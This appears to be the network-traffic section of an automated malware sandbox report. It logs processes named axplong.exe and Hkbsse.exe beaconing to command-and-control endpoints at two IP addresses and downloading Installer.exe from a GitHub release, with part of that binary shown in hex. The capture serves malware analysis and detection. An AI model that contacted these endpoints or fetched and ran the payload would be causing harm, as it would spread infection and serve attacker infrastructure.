r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:29.104379892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	53008	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:28.569416046 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:29.290554047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	53009	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:29.212013006 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:29.882747889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:29.888067961 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:30.083599091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	53010	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:29.401637077 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:30.093971968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	53011	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:30.107167006 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:30.794559956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	53012	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:30.197411060 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:30.832868099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:30.836240053 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:31.027075052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	53013	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:30.926055908 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:31.617235899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	53014	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:31.134021997 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:31.771667004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:31.773243904 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:31.964425087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.5	49704	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:09:51 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-23 22:09:51 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Sun, 23 Jun 2024 22:09:51 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-23 22:09:51 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49714	140.82.121.3	443	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:15 UTC	98	OUT	GET /frielandrews892/File/releases/download/installer/Installer.exe HTTP/1.1 Host: github.com
2024-06-23 22:10:15 UTC	998	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sun, 23 Jun 2024 22:10:15 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240623%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240623T221015Z&X-Amz-Expires=300&X-Amz-Signature=c163ac208612b7b63d5785e8f151bf6531baa21ef9044bfa7b39e25f7ba95711&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-06-23 22:10:15 UTC	3029	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:16 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=snCtFLruYoD2GD+&MD=SB3RsRL1 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-23 22:10:16 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 9e9848bd-3895-4dda-868c-d9c77312c540 MS-RequestId: 6d475eff-c8a2-41ac-a809-f3ed22e35aa1 MS-CV: 5ftYOR5SbU+7jhk4.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 23 Jun 2024 22:10:15 GMT Connection: close Content-Length: 24490
2024-06-23 22:10:16 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-06-23 22:10:16 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49717	185.199.111.133	443	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:16 UTC	589	OUT	GET /github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240623%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240623T221015Z&X-Amz-Expires=300&X-Amz-Signature=c163ac208612b7b63d5785e8f151bf6531baa21ef9044bfa7b39e25f7ba95711&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com Connection: Keep-Alive
2024-06-23 22:10:16 UTC	778	IN	HTTP/1.1 200 OK Connection: close Content-Length: 158208 Content-Type: application/octet-stream Last-Modified: Tue, 18 Jun 2024 12:59:30 GMT ETag: "0x8DC8F967E22F003" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: a623d972-601e-0061-4d7f-c1c216000000 x-ms-version: 2020-10-02 x-ms-creation-time: Tue, 18 Jun 2024 12:59:30 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=Installer.exe x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Sun, 23 Jun 2024 22:10:16 GMT Age: 0 X-Served-By: cache-iad-kjyo7100172-IAD, cache-nyc-kteb1890089-NYC X-Cache: HIT, MISS X-Cache-Hits: 1973, 0 X-Timer: S1719180616.358645,VS0,VE40
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 44 d8 fe 65 00 b9 90 36 00 b9 90 36 00 b9 90 36 14 d2 95 37 01 b9 90 36 14 d2 93 37 02 b9 90 36 14 d2 94 37 12 b9 90 36 14 d2 91 37 11 b9 90 36 00 b9 91 36 a0 b9 90 36 14 d2 98 37 0a b9 90 36 14 d2 6f 36 01 b9 90 36 14 d2 92 37 01 b9 90 36 52 69 63 68 00 b9 90 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f8 c4 1b ae 00 00 00 00 00 00 00 00 f0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$De666767676766676o6676Rich6PEd"
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: ff 48 3d fe ff ff 7f 48 8b f1 b9 57 00 07 80 0f 47 f9 85 ff 78 3b 48 8d 5a ff 48 8b ce 48 8b d3 4c 8d 4c 24 58 33 ff 48 ff 15 98 84 00 00 0f 1f 44 00 00 85 c0 78 0f 48 98 48 3b c3 77 08 75 19 40 88 3c 33 eb 13 40 88 3c 33 bf 7a 00 07 80 eb 08 48 85 d2 74 03 c6 06 00 8b c7 48 83 c4 20 5f 5e 5b c3 cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 56 48 81 ec 80 00 00 00 48 8b 05 20 ae 00 00 48 33 c4 48 89 44 24 70 4c 8b f1 66 c7 44 24 6c 00 05 33 ed 48 8d 0d 05 85 00 00 8b fd 89 6c 24 68 48 ff 15 08 80 00 00 0f 1f 44 00 00 48 8b d8 48 85 c0 0f 84 9a 00 00 00 48 8d 15 f0 84 00 00 48 8b c8 48 ff 15 2e 80 00 00 0f 1f 44 00 00 48 8b f0 48 85 c0 74 6d 48 8d 44 24 60 41 89 2e 48 89 44 24 50 44 8d 45 20 89 6c 24 48 48 8d 4c 24 68 89 6c 24 40 8d 7d 01 89 Data Ascii: H=HWGx;HZHHLL$X3HDxHH;wu@<3@<3zHtH _^[H\$Hl$VWAVHH H3HD$pLfD$l3Hl$hHDHHHHH.DHHtmHD$`A.HD$PDE l$HHL$hl$@}
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: d0 4d 8b f9 45 33 ed 4d 8b e0 ba 04 01 00 00 48 8d 82 fa fe ff 7f 48 85 c0 74 13 41 8a 04 0a 84 c0 74 0b 88 01 48 ff c1 48 83 ea 01 75 e1 48 85 d2 48 8d 41 ff 48 0f 45 c1 44 88 28 80 7d 50 22 75 0d 48 8d 15 23 80 00 00 48 8d 45 51 eb 0b 48 8d 15 1a 80 00 00 48 8d 45 50 48 8d 4c 24 30 48 89 44 24 30 e8 bb fe ff ff 48 8b 7c 24 30 48 83 cb ff 48 8b f0 48 85 ff 74 6c 48 8b c3 48 ff c0 44 38 2c 07 75 f7 48 83 f8 03 72 5a 8a 47 01 b1 5c 3c 3a 75 05 38 4f 02 74 08 38 0f 75 48 3a c1 75 44 48 8d 44 24 40 4c 8b c7 4c 2b c0 48 8d 4c 24 40 ba 04 01 00 00 48 8d 82 fa fe ff 7f 48 85 c0 74 13 41 8a 04 08 84 c0 74 0b 88 01 48 ff c1 48 83 ea 01 75 e1 48 85 d2 48 8d 41 ff 48 0f 45 c1 44 88 28 eb 5a 41 b9 04 01 00 00 4c 8d 05 59 be 00 00 48 8d 44 24 40 41 8b d1 4c 2b c0 48 Data Ascii: ME3MHHtAtHHuHHAHED(}P"uH#HEQHHEPHL$0HD$0H\|$0HHHtlHHD8,uHrZG\<:u8Ot8uH:uDHD$@LL+HL$@HHtAtHHuHHAHED(ZALYHD$@AL+H
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: 00 00 0f 1f 44 00 00 4c 8d 44 24 30 ba 28 00 00 00 48 8b c8 48 ff 15 0f 75 00 00 0f 1f 44 00 00 33 c9 85 c0 75 23 21 44 24 28 45 33 c9 45 33 c0 ba f5 04 00 00 c7 44 24 20 10 00 00 00 e8 64 31 00 00 33 c0 e9 9e 00 00 00 4c 8d 44 24 3c 48 8d 15 15 7b 00 00 48 ff 15 e6 74 00 00 0f 1f 44 00 00 48 8b 4c 24 30 4c 8d 44 24 38 48 83 64 24 28 00 45 33 c9 48 83 64 24 20 00 33 d2 c7 44 24 38 01 00 00 00 c7 44 24 44 02 00 00 00 48 ff 15 d7 74 00 00 0f 1f 44 00 00 48 8b 4c 24 30 8b d8 48 ff 15 6c 75 00 00 0f 1f 44 00 00 85 db 75 17 ba f6 04 00 00 83 64 24 28 00 45 33 c9 45 33 c0 33 c9 e9 6f ff ff ff 33 d2 8d 4a 02 48 ff 15 58 78 00 00 0f 1f 44 00 00 85 c0 75 07 ba f7 04 00 00 eb d2 b8 01 00 00 00 48 8b 4c 24 48 48 33 cc e8 56 67 00 00 48 83 c4 50 5b c3 cc cc cc cc cc Data Ascii: DLD$0(HHuD3u#!D$(E3E3D$ d13LD$<H{HtDHL$0LD$8Hd$(E3Hd$ 3D$8D$DHtDHL$0HluDud$(E3E33o3JHXxDuHL$HH3VgHP[
